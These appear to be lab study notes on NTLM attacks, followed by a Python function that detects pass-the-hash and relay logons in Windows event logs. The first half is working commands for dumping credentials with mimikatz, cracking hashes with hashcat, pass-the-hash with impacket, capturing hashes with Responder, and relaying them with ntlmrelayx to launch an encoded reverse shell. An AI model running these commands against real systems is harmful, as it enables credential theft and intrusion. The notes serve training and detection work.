NTLM Attacks


Cracking NTLM hashes

# powershell: list local users
Get-LocalUser

# powershell as admin
cd C:\tools
.\mimikatz.exe

mimikatz> privilege::debug # enable SeDebugPrivilege (needed to read LSASS)

mimikatz> sekurlsa::logonpasswords # dump logon credentials from LSASS (large output)


mimikatz> token::elevate
mimikatz> lsadump::sam # extracts NTLM hashes from the SAM (needs token::elevate)

# crack the NTLM hash and connect with RDP
kali@kali:~/passwordattacks$ hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

# find the correct hashcat mode: -m 1000 is NTLM

kali@kali:~/passwordattacks$ xfreerdp /v:192.168.122.210 /u:nelly /p:nicolel /w:1200 /h:700

Passing the NTLM hash (pass-the-hash, used for lateral movement)

kali@kali:~/passwordattacks$ smbclient \\\\192.168.122.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b

kali@kali:~/passwordattacks$ impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.122.212
# -hashes takes LM:NTLM; the first part (all zeros) is the empty LM hash, the second is the NTLM hash

kali@kali:~/passwordattacks$ impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.122.212


Scenario without local admin privileges (so mimikatz cannot be used)

# check paul's account details and group memberships (is he a local admin?)
PS> net user paul

# set up an SMB server with responder on kali, then connect to it from the Windows host, then capture and crack the NetNTLMv2 hash
sudo responder -I tun0

PS> dir \\192.168.119.122\test

# responder automatically captures the NetNTLMv2 hash.
# we save it in paul.hash

hashcat -m 5600 paul.hash rockyou.txt --force # -m 5600 is NetNTLMv2


# NTLM relay with ntlmrelayx (relays the captured authentication to the target instead of cracking it)
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.119.212 -c "powershell -enc base64revshell"

# on files01
PS> dir \\192.168.119.122\test
Invalid signature

# in ntlmrelayx
# the connection arrives and is relayed towards the target, which then executes the command
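From the defender's side, both the pass-the-hash and the relay above show up on the target as Security event 4624 network logons (LogonType 3) authenticated with NTLM. The following triage function is an added example, not part of the original notes: it flags NTLM network logons whose source IP is not in a host inventory, and logons whose claimed WorkstationName belongs to an inventoried host while the packet actually came from a different address (a relay indicator). The inventory and the event records are constructed for this example; the field names are the EventData names used in the Security log XML.

```python
# Inventory of known Windows hosts, IP -> NetBIOS name (constructed for this example).
INVENTORY = {
    "192.168.122.210": "FILES01",
    "192.168.122.212": "FILES02",
}
NAME_TO_IP = {name: ip for ip, name in INVENTORY.items()}

# Constructed 4624 EventData records; not real log output.
SAMPLE_EVENTS = [
    # Interactive console logon: benign.
    {"EventID": 4624, "LogonType": "2", "AuthenticationPackageName": "Negotiate",
     "LmPackageName": "-", "WorkstationName": "FILES01", "IpAddress": "127.0.0.1",
     "TargetUserName": "nelly"},
    # Kerberos network logon from an inventoried host: benign.
    {"EventID": 4624, "LogonType": "3", "AuthenticationPackageName": "Kerberos",
     "LmPackageName": "-", "WorkstationName": "FILES01", "IpAddress": "192.168.122.210",
     "TargetUserName": "paul"},
    # NTLM network logon from an IP that is not in the inventory: pass-the-hash from a foreign box.
    {"EventID": 4624, "LogonType": "3", "AuthenticationPackageName": "NTLM",
     "LmPackageName": "NTLM V2", "WorkstationName": "KALI", "IpAddress": "192.168.119.122",
     "TargetUserName": "Administrator"},
    # NTLM network logon that claims to come from FILES01 but arrives from another IP: relay.
    {"EventID": 4624, "LogonType": "3", "AuthenticationPackageName": "NTLM",
     "LmPackageName": "NTLM V2", "WorkstationName": "FILES01", "IpAddress": "192.168.119.122",
     "TargetUserName": "paul"},
]


def ntlm_indicators(event):
    """Return indicator strings for one 4624 event; an empty list means nothing suspicious."""
    if event.get("EventID") != 4624 or event.get("LogonType") != "3":
        return []
    if event.get("AuthenticationPackageName") != "NTLM":
        return []
    reasons = []
    ip = event.get("IpAddress", "-")
    claimed = event.get("WorkstationName", "-").upper()
    if ip not in INVENTORY:
        reasons.append(f"NTLM network logon from non-inventoried host {ip}")
    # A known host name presented from an address that is not that host's: relayed authentication.
    if claimed in NAME_TO_IP and NAME_TO_IP[claimed] != ip:
        reasons.append(f"workstation name {claimed} presented from {ip}, relay indicator")
    if event.get("LmPackageName") == "NTLM V1":
        reasons.append("NTLMv1 response used")
    return reasons


def triage(events):
    """Return (user, source ip, reasons) for every event that raised at least one indicator."""
    hits = [(e["TargetUserName"], e["IpAddress"], ntlm_indicators(e)) for e in events]
    return [h for h in hits if h[2]]
```

Requiring SMB signing on the target is what makes the relay fail (the "Invalid signature" seen above), so the relay indicator should stay rare once signing is enforced.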